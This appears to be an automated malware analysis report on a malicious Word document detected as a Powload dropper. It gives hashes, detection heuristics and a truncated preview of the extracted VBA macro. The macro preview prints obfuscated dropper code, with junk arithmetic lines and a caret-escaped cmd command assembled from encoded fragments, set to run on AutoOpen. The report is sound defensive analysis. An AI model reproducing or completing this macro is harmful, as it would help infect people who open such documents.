Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e29e12f084bcb9a…

MALICIOUS

Office (OLE)

86.2 KB Created: 2018-08-28 22:37:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 4ee7507eee527aff1a84799997b8f4d4 SHA-1: da3c1adf2f8db3ccacf0b8a676b7b99142a7d324 SHA-256: 7e29e12f084bcb9a38f922c452338e06a41407367a22c501a679b74780677282
202 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Powload-6922834-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6922834-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8120 bytes
SHA-256: 46800935e5e383557a111879625240b51560fae8ce3ec98ca8b7c93825cd6d04
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JaGDchvzVm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qziWUiTLh"
Function BrXdNCmR()

On _
Error _
Resume _
Next
Hour 91408 * lPOzPD * 56504 * ttUsp
   Hour CvlbG * SwcPaM / 204 * LCjGO
CzzCmpY = "md /V:" + "/" + "C" + Chr(2 + 3 + 4 + 5 + 20) + "^s^" + "e^t ^K" + "^u^S=^" + "A" + "^" + "ACA" + "^"
Hour wvkwPR * uGStwH / 2952 / ipvSQ
   Hour pqdCiq * maOLYw * qHVAHi / 17733
PhmkfcHKnj = "g^A^AI^" + "A^AC" + "A^g" + "^A^AI" + "A^ACA" + "^g" + "^AA" + "^" + "IAAC" + "^" + "A"
Hour MJpwR * swrNG * VMjAGU / 83890
   Hour 51787 * onYWvV
   Hour jDXrhZ / JDahY / qYBqUG * Pjkjw
   Hour RGcoQ * RcGRGk
fTzKI = "^g^A" + "A^IA^A" + "C^A^" + "gAAI" + "AAC^A^g" + "^" + "A" + "Q^" + "fA" + "^0HA"
Hour 31063 / kJWDS
   Hour 90171 / QzCblR / 70708 / OSkjj
OjhVMEK = "^7BAa^" + "AM" + "^GA" + "^0^B^Q" + "Y^A^M^" + "GA9" + "^Bw^O" + "As^GA"
Hour 53165 / zLarnH / 15038 * ofivZ
   Hour AiqwEV * aSOIJW
   Hour 46791 / PBNTB
   Hour LqdbkN / HlmHs * 28685 * QYOuLU
   Hour CdsuO / lGModG * tiTqi * DoEfPs
vvJbpr = "^hB" + "^Q^ZAIH" + "^AiB^" + "wO" + "AkGA^U" + "B^QVA^Q" + "C^A" + "^gA^Q^b" + "AU^GA^0" + "^B^Q^S^" + "A" + "^0"
Hour hYYfw * dBjYiq
   Hour KFjGil * friJi / AkVCS * zfucL
   Hour 4961 * 10516 / PfqnPr / CdPGJ
JiuCqN = "CA^l" + "B^w^a^" + "A8GA^" + "2^B^g^b" + "^Ak" + "E^" + "A7A^Q" + "KAk^G^" + "A^U^B^Q" + "VAQC^"
Hour 62713 / WTlcRN * MVNvP * VRffLQ
   Hour VOUwhs / LMtdOl
   Hour 40985 / cXBIi
nfPTBaBwF = "A" + "^g^A^A" + "L" + "^A0^E" + "^A" + "^3" + "^" + "B^wV^A^" + "QCAo^A" + "^Q^ZAwG" + "^A^p^" + "BgR" + "^"
Hour 91617 * 76878
   Hour 93894 * jYdKhd / 73633 / cCLaEX
   Hour 68013 / sunpQ
   Hour 15407 * adslUw / FQfjU * AIURBr
   Hour 92235 * CnODN / 5946 / ZIIkn
zUzWjtrE = "A^" + "Q^G^" + "A^" + "h" + "B^wb^" + "A" + "^"
Hour 94163 / rXbjwQ * SZHEq * PGzhfj
   Hour 62316 * WaIlYJ
   Hour 40193 / 57710 / 3218 / YIZNwb
kKPnUjrIO = "w^" + "G" + "^" + "A^u^B^w" + "d" + "A" + "^8G^A" + "^EB" + "g^L" + "^Ak^"
Hour DidlW / UEpkBE
   Hour 92712 * AbLrQ * FdCwH / jmkEW
Jzctj = "G^A^q" + "B^gV^A" + "QC^A7B" + "Q^eAI^" + "HA0B^w" + "^eA^kC^" + "A" + "y^" + "Bw^d^A" + "^M" + "^E^A^k"
Hour rwXObo * ftznNL
   Hour 23404 / QVVtw
OFlMKujGTH = "^A^AI^A" + "4" + "G^" + "A^pB^" + "A" + "I^A^0" + "^EA^" + "3B^w" + "V"
Hour 74501 * pnREj / 60539 / tEIEDw
   Hour 52403 * ZjCKtu
wfJmnhROG = "^A" + "Q" + "C^A^o^" + "A^A^a^A" + "M^G^" + "AhBQZA^" + "IH^Av"
BrXdNCmR = CzzCmpY + PhmkfcHKnj + fTzKI + OjhVMEK + vvJbpr + JiuCqN + nfPTBaBwF + zUzWjtrE + kKPnUjrIO + Jzctj + OFlMKujGTH + wfJmnhROG
   Hour nAlYt / VkzmBb
   Hour UqUHQ / 14714 * 34493 / 38391
End Function
Function lWRpZ()

On _
Error _
Resume _
Next
Hour 32641 * RYbVu / 62297 * psiLUL
   Hour 38187 / avqIw * pYsYk * MqsmK
   Hour 67922 / zdaAw * iTZnr * 36203
   Hour 38108 * rHUZwI * rUjlVp * zwwYwW
mVSfYDdZA = "B" + "gZAs" + "^D" + "AnAQZ" + "^Ag^H^"
Hour 10729 / MAsoZ
   Hour 86607 / wzRYrt * GAjjfL / wEMnFF
   Hour CqOwOu * TXQwdt / TvUzOf / oCaFT
ZVXLS = "A^l^" + "Bg^" + "LA" + "cC^ArAA" + "^Z^A^" + "8^G" + "A^3" + "BA^J^" + "A" + "^sCAn^A" + "A^X^Ac"
Hour mlnIKv * JsfkJj / SjhzV * RSIqFi
   Hour 87735 / oYnaM
   Hour otvqIs * fIVjfs
   Hour SiWdij * YTiDKT / 56180 * CfhmVz
saYIAzpsFHw = "CAr^A^w" + "^Y" + "^Ak" + "G^AsB^g" + "^Y^AUHA" + "^w^" + "B^g^O^A" + "Y^H^"
Hour jqpMjA * EzVbIF * QCLSDw / PchkV
   Hour wQLDs * idnkT / 59709 * hYiIlv
TKfzkiJIQ = "Au" + "B^Q^ZA" + "^QC" + "A^" + "9^AQ" + "a" + "A^Q^F^" + "AV^"
Hour 71736 / tMrlQ
   Hour jzzcp / ZjcoNX * 6197 / Mowwj
   Hour ABVWn / nqMZQi / ocfzfq * PVqXjS
   Hour 15237 / OLdIjJ / PuEnO * zYAYrz
   Hour 98957 * izKBSq / ZNPfI * TUZsV
MBuiHosLlMz = "B^A^J^A" + "^s" + "D" + "^An^A" + "gNAM^" + "DA0^A" + "w" + "^J^" + "AACA9A" + "^"
Hour bMiCGi * znVzi
   Hour antwO / 92075 / JRTiE / BYmli
OkTtmWHq = "A^
... (truncated)